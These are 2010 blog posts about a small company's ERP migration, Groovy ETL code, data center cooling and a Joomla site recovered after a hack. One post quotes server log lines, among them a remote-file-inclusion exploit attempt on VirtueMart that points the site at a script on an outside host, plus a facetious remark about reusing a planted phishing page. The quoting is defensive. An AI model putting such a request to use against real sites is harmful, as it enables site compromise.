Sunday, September 12, 2010

Business Transformation phase 2 write-up turns into ERP rambling

After a month or so of hard work, the very alpha of the front-end application for the sales team is released.  Although the functionality is very limited, I am a believer of the release early, release often motto.  It is vital not to hide in the corner, spend lots of time to work on your "brilliant idea", release it then realized it is quite disconnected from reality.

In our current utilization of the Access-based ERP system, we have stretched it to its limits.  For example, we are using it for quite a bit of analytical work such as average sold and purchase price calculations, customers sales history, cash flow reporting, product sales activity, etc.  With 15 years of sales history, this queries are a little bit too much for MS Access and its Simple JET-Engine architecture.

Some may then ask: What is the point of building the MS-Access ERP system and only to begin migration of it in 1/2 year?  Isn't it a complete waste of time and money?  Since a lot of business folks would like to compare software development with car manufacturing(1), I would use the car analogy too:  It is not a complete waste of money to buy a car for 1/2 year only to dump it for another car.  What is the ROI? Blah, blah, blah ... ...

This is a classic pitch from ERP software vendors to make you buy their ERP.  Why waste time developing your software when you can simply by a COTS products.  Yes, they love their TLA just to look smart.

No doubt some business should buy off-the shelve software to use it to solve well defined problems such as tax returns, restaurant POS/order entry/reservation management, but since a lot of business have this expectation, of it being this in-all, be-all system, well all information and all business process in to their ERP system, is your business a "off-the-shelve" business?

To be fair to the business folks, their expectation is probably inflated by the rogue vendors, salesman and all these marketing BS trying to prey on the unsuspecting folks.

Since I love the car analogy, let's go back to it with a software development-twist:

Buyer:  I need a car.
Salesman:  It is your lucky day, the new Prius just came in! It just won the "Best Resale Value" award from Kelley Blue Book's, it was named one of Forbes "Tougheset Cars on the Road", blah blah blah ... (and the list goes on)
Buyer: This must be a great car with all these recognitions
Salesman: Best of all it is a Hybrid, using Green Technologies and all.  You know, some the planet, save some trees. (What the hell is green technology?)
Buyer: Wow! I can really help the world with this car.
Salesman: It has great on mileage too!  That means this car will saving YOU money at the gas pump.
Buyer: Wow, I am really saving money buying this car.

No problem with the story? Here is where the analogy breaks down.  We never know what the buyer wants to do with the car!

In the software world, many buyers probably never driven a car before, have only seen piece of the car (think just the dashboard, the steering wheel, engine) but never seen the car as a whole.  They have read some fancy, vague, sales pitches in article in the latest magazine of how great a car is, for example:
  •  "A car can take you from point A to point B very fast!" - buyer thinks he could use it to go from America to China really fast.
  • "Save you money going to and from work!" - buyer walks 5 minutes to work, but since he doesn't really know what a car is, he really think it will save him money.
  • "Revolutionize the way you travel" - now he thinks he can go to all these exotic countries he saw on the Travel Channel.
But you might think, the car buyer is being really stupid. How can he not know about what a car is. This comparison is complete bogus and unsound.  If that is what you are thinking, here is a question for you: What is an ERP system?


This post started off with the intention to write about our effort in business transformation.  It went complete off tangent into a rambling.  Oh well, I probably have ADD.  That's the beauty about blogs right?


(1) Disclaimer: I have not read the book.  I have only derived some basic understanding of the book from a blog post by Jeff Atwood

Saturday, September 4, 2010

Using Groovy script for ETL, and more about the ERP

After 7 months of hard work, we have successfully migrated off a primitive console base system. The console base system consist of just 2 tables:
  • Order + Line Items (this is one table!)
  • Products (It was called Inventory, but really it just keep track of the product code, description and the Stock on Hand)
As a result of the primitive construct, little could be derived from the data. In phase one, we were able to make use of the data in the old system and merge it with 3 years of purchasing record stored in some excel documents. The ETL exercise itself was quite laborious. Merging 15 years of sales record and 3 years of purchase record was no small feat! Groovy scripts proved to be very handy for this ETL exercise, and Groovy's Java heritage, there was shortage of connectors to different data systems. For we have two sources: FoxPro DBF file and Excel XLS file, and the target system is a MS Access accdb file.  Here is an example to demonstrate how concise the connection code is, which free us to concentrate on the transformation logic:

def src= Sql.newInstance("jdbc:odbc:Driver={Microsoft Excel Driver (*.xls)};DBQ=<path to xls file>;DriverID=22;READONLY=true", "", "", "sun.jdbc.odbc.JdbcOdbcDriver");

def dest = Sql.newInstance("jdbc:odbc:Driver={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=<path to accdb destination file>;pwd=<accdb file password>", "", "", "sun.jdbc.odbc.JdbcOdbcDriver");

src.eachRow("SELECT [PRODUCT ID], [PRODUCT CODE], ... WHERE ...", {
  // function body to process each row obtain from your source using the SQL statement
  // it.<field name> to get the value: for example:
  def productId = it."[Product ID]"

  // ... more code to get stuff from source

  // ... probably logic to run different insert statements base on different value from the source and business logic

  // an example to insert data into your target
  dest.execute("INSERT INTO [Products] ([Product ID], [Product Code], ...) VALUE (?,?, ...)", [productId, productCode, ...])
});

The new system went live after 3 weeks of hard work and we ran the old and new systems in parallel for 1 quarter and a bit. As of August, I am happy we are comfortable enough with the new system and since retired the old FoxPro system. During the last 1 quarter and a bit, development of the new system has continue to evolved. The functionality of the system and integration with the company is depicted in the following diagram:

There are two main problems with the above ecosystem:
  1. Salesman, Inventory Controller, Shipper and Couriers all rely on the clerk to access the system.  
  2. The analysis and data mining activity by the managers are stretching the limit of Access.
In the next phase of the evolution we have plan on addressing the above issues and add on more features. In order to prepare for the next phase, I have begun migrating the data in Access to SQL Server Express. This proved to be quite a challenging task, migrating a live system while trying to minimize the interruption to the business. I am in the middle of the process and this whole migration could be a post of its own.

Sunday, August 29, 2010

Webmaster - The Operator in Matrix

I have been a webmaster of our company website for a few months now, and it reminds me of the Operator in the Matrix.


After the company website got hacked, I took on the role of maintaining the website as well.  I find myself parsing through access and error logs looking for anomalies.  To the average Joe, I guess it could look a lot like the Matrix.

However, staring at the "Matrix" has proven to be quite informative.  Although I found no hot blonde in red dress, I did learn a think or two about the www.  I didn't realized there are so many search engines out there. Here are a few I spotted in our access logs:

  1. Google
  2. Yahoo (slurp)
  3. Baidu
  4. MSN
  5. Sogou
  6. Youdao
  7. Soso
Deja Vu in the Matrix? I got a few of those.  Here are a few anomalies I spotted:
89.108.67.164 - - [31/Jul/2010:20:33:55 +0800] "GET /website/index.php/component/virtuemart/details/117/69/remote-power-control/server-technology/switched-cdu///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 200 45891 "-" "libwww-perl/5.812"
Spot anything?  Turns out it is an attempt to exploit a vulnerability in VirtueMart <=1.1.3.  Good things since I have re-did the website, I know exactly what is in it.  I have *all* the website components' release RSS feed in my Google Reader, setup up some kind of test-bed and source control, and make it a habit of patching the website soon after a release.  For the nitpicker smarty-pants out there, no I don't mean all the components of the website, that is why the *all* is quoted with a asterisks. I am not maintaining the website's Apache, PHP and MySQL infrastructure, let's hope our web-hosting company do a good job in maintaining that.
66.113.102.253 - - [31/Jul/2010:21:41:39 +0800] "GET /website/components/chase.com/logon_confirm/index.htm HTTP/1.1" 404 2203 "-" "Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE"
Looks like the hacker's script which planted the phony JP Morgan Chase page on our website back in March still thinks we are hosting their page.  Hmm.... since the hacker is already directing traffic to our site, maybe I should rebuild the Logon page and collect the login information for my evil use.


Arrwaaaaaa hahahhaha! (The Evil laughter)

Saturday, August 28, 2010

Environment Monitoring Probe Optimization and the "-Xnoclassgc" Java parameter

By integration an existing monitoring software and some wireless reader and sensor technology, we have quickly came up with a prototye software to do environment monitoring as mentioned in another post. We where able to deploy a POC with a client and the feedback was positive.  However the client did notice some lingering Java process on the server where the software was deployed.  This is okay for a POC, but probably not okay for a live site with a lot of probes.  Luckily with our software, we are able to monitor the response time of these probes and chart it.  In a our test-bed with more than 100 sensors, I have picked 50 sensors and charted their response time.  They are indicated in the chart below.  During the time frame annotated with (1), it is the response time of the first generate probes.


Initially, I was hoping for a quick fix with some optimization parameters. Since this is a short-lived Java program, I used the "-Xnoclassgc" parameter and boom! the response time dropped by more than a third.  The response time can be seen marked as (2) in the chart.  If you do a quick google about the "-Xnoclassgc" parameter, you will get a lot of warning about using this parameter.  For example, this article titled "Java’s -Xnoclassgc considered harmful".  However, for a short-lived program, this is one of the situation which warrants using this parameter.

With the -Xnoclassgc fix, the response time of the probes are still taking almost 2 seconds, while when I do a network ping, it is roughly taking between 100~200 ms. In order to address this issue, a re-architecture of the probes were necessary.  While for the initial development, I was keeping the quick-to-market approach in mind now it is time to take it to the next-level for real production usage.

To ensure the long time viability of this solution, I have also setup proper source control and redundant repositories to ensure the code is not lost.  With the new version with the new streamline code base, the solution has been optimize in both size and speed.  The response time is now comparable to a ping command between 100~200 ms as indicate in section (3) in the chart.  The deployment package was also shrunk from over 1.1 MB to 21 KB.  With this improvement, there are no longer any lingering Java process on the server!

Sunday, August 22, 2010

Finally a more stable development environment for PHP/Joomla

Working on our Joomla based website has been a pain for the longest time for me.  I have the development setup using XAMPP 1.7.3, and Netbeans 6.8. One of the key tool for a developer is the ability to run in debug more and step-through the code, inspecting the variables during runtime.  Unfortunately, for my default setup, the Apache HTTPD process crashing when ever I tried to inspect a variable.  A quick Google on the web showed there is a lot of people facing similar issue:
When our website got hacked as mentioned in an earlier post, the migration from Joomla 1.0.x to 1.5.x would have been a lot more easier with a properly setup development environment.

The good news xdebug v2.1.0 release on 2010-06-29 has been working a lot more stable for me.  Although still crashes a lot, way more than what I am use to on the Java platform, it manages to hold up for most of the time in order for me to inspect the code and runtime variable to get a good sense of what is going on.  Good thing is the current website is still fairly stateless and I could get back to the page or state I want to debug fairly quickly after a crash.

Perhaps this why there is still a lot of debate on whehter PHP is ready for the enterprise.  I hate to be working on an issue deep inside a complicated workflow on a PHP platform! 

Wednesday, August 18, 2010

Wireless, Real-time, Environment Monitoring Solution

We have packaged a total solution for data center environment monitoring.  Our primary focus is to allow organization understand the environment where they host their mission critical equipments.  Most data center continue to crank up the CRAC units at their data center and freeze the entire server room without a clear picture of the environment situation in the data center.  Traditional BMS system just measure one a 2 points in the server room, which is grossly in efficient.  With the increasing powerful server equipments such as blade server, we now have racks which are easily over 5kW.  In comparison, a commercial oven or stove is typically only 4kW.  This is why localized hotspot can easily develop in your data center!


With rising energy price and the Green IT movement, it is not only hip to optimize your data center cooling, but it also save your organization money.  If Google said you should raise you data center temperature, it must be the correct thing to do right?  Don't trust Google? What about the engineers atAmerican Society of Heating, Refrigerating, and Air-Conditioning Engineers (ASHRAE). ASHRAE has update their environment condition recommendation for server equipment, and they have increase the up-limit equipment in-take temperature to 27 deg C.  Don't want to take the risk of causing environment problems in your data center by initiating a cooling optimization effort?  Well, monitoring it first!

Learn more about Quantum Data Systems' wire-free, real-time environment monitoring solution.

Tuesday, July 6, 2010

IBM Aquasar


IBM came up with a server with chip level cooling using water.  Beside all the CCNP, CCIE and other fancy certification, all of us nerds need to get their local plumbing license as well.

Saturday, June 19, 2010

Data Center Visits

In the past few months, I got a chance to visit a few data centers.  From small server rooms to large co-location sites, these were great opportunities to get first hand experience at these operational data centers.  There are sites which are very organized and structured, and there are sites which are very ill-planned to the point they are basically a patch work of racks put randomly in a room.  Yet, they are both facing similar cooling challenge, where high heat-load server blades are simply too much for these data centers.  In a few years, server racks went from 1-5 kW, to 10kW or even 20+kW racks.  These data centers are simply not designed with these type of heat density growth in mind.

With our company venturing into the cooling optimization products and services, it is invaluable to get on the ground experience, see all sorts of different data centers, and the challenges face by these operators. In the past 2 weeks, I was able to visit the server rooms of 2 organization.  One of them is in the process of revamping the server room to accommodate the high heat-load server blades which are already in place, and more are coming in.  Another organization is also in the process of procuring new servers, and wanted to do a proof-of-concept solution first.  Proposes were put forth, and I have not receive any feedback yet.  It is time to follow up next week and perhaps, fingers cross, just may be, I will get my first sale.  Either way, it is a learning process, I hope to get some insightful feedback and see how we can better position ourselves to serve the impending need for cooling optimization.

Sunday, June 13, 2010

Testing Twitterlive - Ping.fm integration

This is to test the Twitterlive - Ping.fm integration I have setup.  I used to used Twitterfeed, but Ping.fm has blocked the API calls from TwitterFeed due to spam problems.
If all goes well, my Twitter, Facebook and other social media accounts should get a snippet of this post and a link back to this page.

Why am I doing this?  In today's information age, people are going to "google" you when you apply for a job, funding, business partnership, etc.  What do you want them to find?

Company Website Revamped

After the company website has been hacked a couple of months ago, I have quickly migrate the content from Joomla 1.1.x to Joomla 1.5.x.  It only took a few days, but I had to drop a few plugins and hack a very scripts.  The abundance of plugin in the open source ecosystem is both a bless and a curse.  It is a blessing because at the moment, the ecosystem allow small business to move into market quickly and cheaply. However, often times the plugin may not be of the best quality, such as poor code which allow hacker to remotely exploit the website.  Furthermore, for less popular software/plugins, the development may cease and may not have compatibility issues with other components you relied on.  This is the case for a lot of the Joomla 1.1.x plugins we have been using.


After successfully migrating to the new platform, I still not happy with the layout.   Luckily, Joomla 1.5.x came with some very professional template and I have based our new website on one of the templates which came with default package.
The new platform also came with some new features which used to be a plugin in the previous version and therefore allow me to retire a few of the plugins such as the LxMenu plugin for Joomla 1.1.x.


The most tedious process is cleaning up the platform for the new platform.  The old website use to have a plugin allowing the display of "tabs" to hold the content.  I decide not to use the "tabs" display format because I believe this is not good practice for the web.  For example, when user search for text, the browser may find it, but because it is not on the current tab at the top, the user may not be able to see it, which may confuse some user.
The website has been up and running with this new template for a good few weeks now, however I don't think we have complete the clean up of the content yet.  There are still pages with dead images, links or old content formating code.  
With our current state of business, I don't think we can afford to hire a full time web-developer/designer.  I could delegate some of the work to my colleagues, which I already have for the simpler task.  However, to take-over the maintenance of the website, I don't think we have an employee with that kind of skill set yet.
In order to justify hiring a web-developer, I need to find a way to turn our website into a revenue generator.  
At the moment, we are getting roughly 70-80 visits a day. Since we are a very niche market company, I don't think our goal is just eyeballs.
  

Perhaps e-commerce?  With niche market products and a small market, will e-commerce work?

Sunday, June 6, 2010

Broken links for product additional files in Virtuemart 1.1.4, Joomla 1.5.15 and SEF turned on

We still have to run our website in legacy mode because Virtuemart is still natively incompatible with Joomla 1.5.x.  The migration to Joomla 1.5.x is obviously incomplete as there is still minor bugs here and their.  One of the bugs which I was unable to find an answer to on the web is the shop.getfile bug.  In virtuemart, you can upload downloadable files against a product, and it will appear to be available for download.




After adding the additional files, there is a link which appears on the bottom of the product details page allowing the user the download the file you just added.

Unfortunately with our setup, the generated URL for the downloadable file was incorrect.  Debugging this issue was painful as I was unable to get XDebug to work properly.  The Apache child process on my local development environment just keep crashing when ever I have the debugger attached, but this is a long story possibly for another separate entry.  It turns out the components/com_virtuemart/router.php was missing the shop.getfile entry and I have to manually added it back it.  Inside the virtuemartBuildRoute function add the shop.getfile case into the switch statement.  It will look something like this:

case 'shop.getfile';
  $segments[] = 'products_getfile';
  $segments[] = $query['product_id'];
  $segments[] = $query['file_id'];
  unset($query['product_id']);
  unset($query['file_id']);
break;

Then in the virtuemartParseRoute function, add the corresponding code to handing the routing statement created above.  It will look something like this:

case 'products_getfile':
  $vars['page'] = "shop.getfile";
  if(isset($segments[1])){
    $vars['product_id'] = $segments[1];
  }
  if(isset($segments[2])){
    $vars['file_id'] = $segments[2];
  }
break;

Adding the above code back in and the additional file links for products works again!

I would like to submit a patch to Virtuemart.  Unfortunately, it appears the development issue tracker at http://dev.virtuemart.net is not open to public submissions. Hopefully this problem is eventually spotted and fixed by the Virtuemart development team.

Sunday, May 30, 2010

Access Northwind used in real life

With an out-date inventory management system, keeping on top of what is flowing in & out of the company became a chore.  Coming from a techie background, my desire to use the latest and greatest took a back-stage to rational mind to use some practical to get the result quickly.  After all, my goal was to have some simple dashboard, which we can easily see what customer orders are coming in and what purchase order we are making.  When necessary, we need to be able to tracing our purchases back to their purpose, which in most cases, it is for a customer order.  It is also important to collect as much information as possible while remain as non-intrusive as possible.  This means customizing the workflow to match the business with the proper prompts and proper validation at the right time.

With all that in mind, the old days playing with Access 97 and their Northwind example came back to mind.  Although the Widget set from Access was fairly restrictive, it was sufficient to satisfy the simple requirement of this application.  The single file-base database was fairly insecure, but it is something I am willing to give up for now in exchange for a rapid development model.  One pleasant surprise was its ability to support concurrent user, and so far we have as much as 3 people access the database at the same time without too much problems.

After 3 weeks of hard work, the application went live on April 5th 2010.  A good chunk of the time was spend migrating the data from an old Fox Pro database an Excel Spreadsheets into the database.


Access proved to be a good choice.  We have been using the application for the last month or so, and adding more features and customization as we go.  The latest module is a service report module which allow us to collect data correlating service calls by our support team back to the customer.  In the beginning, it will seem like a chore.  Hopefully over time, it will allow us to gain better insight in our business and better serve our customer.

I was very tempted to move the database to a SQL Server in the near future, and my justification is better security and better support for multi-user.  The first issue regarding security is valid, but I am not sure it justifies the time and investment required at this stage.  The second issue is simply my techie side talking, since the Access database should be able to support the current load without any problem.

Microsoft publish a great document to help user rationalize the decision of when to migrate from Access to SQL server. The document is simply named "When to migrate from Access to SQL Server"  Inside the document, it has a fairly nice pie chart illustrating how many application will actually need upsizing:

SQL Server Salesmen are probably not too help with the Microsoft employee who wrote the document :)

Sunday, May 16, 2010

Back to PHP

A long long time ago, I started working on a prototype project for a mobile payment system using PHP.  If memory serves me right, it was PHP3.  Almost a decade later, I am back to PHP.  It was not fun.  Between these times, I have worked mostly on Java and have got use to the ecosystem around the Java language, and it was not easy letter or those go.
I have been listening to the StackOverflow podcast, and Jeff Attwood cannot seems to contain his hatred for the PHP language. I am not a big fan of weakly typed language or scripting language used in large scale applications.   And this is exactly what I am faced with now.  My companies website is using Joomla + VirtualMart + a whole bunch of plugins, and long and behold, it was hacked recently.  Some module with remote exploitable flaw was load on the website and it wasn't long until some hackers program found us and dumped a JPMorgan Chase phishing site on our page.
It was long until RSA contacted our hosting provider and they shut us down.  We haven't updated our Joomla installation for quite a while and it came back to bite us.  After a day of work to try and remove the phishing site and purge the hackers code, our site was shutdown again because I was unable to purge it properly.  It appeared the hacker also manage to turn our server into a SPAM server.  After a few more hours of struggle, I decide to conclusively patch the existing site from all malware is going to be futile and went about upgrading our Joomla installation.

Boy it was a pain ...

It is getting late, I should rant about this some other time.

Wednesday, May 12, 2010

110 Visit in Oct?

It has been a long time, but I have been working diligently at my new endeavor. It has been an tough, but exciting time. However, this topic is for another post.

My work has took me back to Google Analytics, and when I logged in, my selfprofessednerd blog analytics popped up. I almost forgot I have added Google Analytics to my blog. I didn't really pay much attention to it back then, but after a while, it slowly and diligently collected visitor data. Woohoo! At one point, I had 110 Visitors!

Google has really transform the way the web works, and had made a lot of highly sophisticated tools available for free. It is time to revisit Google tools and see how I could apply it to the business I am working on!

Saturday, February 13, 2010

Reflecting on the US trip

As I wait for my flight in Albuquerque's Sunport Airport, enroute to Hong Kong, it was a good time to reflect back on what was learned on this trip. I have been working in the application space for quite a while now, and it is interested to look at it at the infrastructure/facility perspective. On this trip, I get to meet some very experienced people in the realm of data centre cooling and it is interesting to compare and contrast their approaches.

Wally Phelps from AdaptivCool is very knowledgeable in the science of fluid dynamics and equipment cooling in general. Their "active" approach to data centre cooling probably stem from their deep experience in equipment cooling and heat dissipation design for electronic devices. Their complete suite of active components (fans with controls and sensors) combined with a web-enabled air-flow management software allow the system to actively sense changes in temperature and move air around to manage the cooling of the data centre.

I also got to meet Lars Strong from Upsite Technologies, the company founded by Ken Brills, who also founded the Uptime Institute, a leading body in data centre management. In comparison, the products from Upsite Technologies first appears much more primitive. The main products include, blanking panels, brush seals from cable openings and temperature sensing strips. These simple plastic-looking material will be a tough sell when they command such a high price. Would their brand name, design and quality assurances worth the price premium? After talking to Lars, he did point out some interesting points which show a lot of thoughts has actually been put into designing the products. Here are some of them I remembered:
  1. The blanking panels are designed such that they can be easily stacked. This allows the blanking panel shipments to be unpacked on site outside the data centre and brought in to the equipment rooms. Why is this important? For a well managed data centre, it is important to keep the equipment room clean. Cardboard boxes and packing material can create a lot of debris and dust when the unpacking is done inside the equipment room.
  2. The blanking panels and brush cable opening seal are made of conductive material (not simple plastic) which prevent buildup of static electricity and help dissipative static build up.
This is it for now, I am about to board my flight.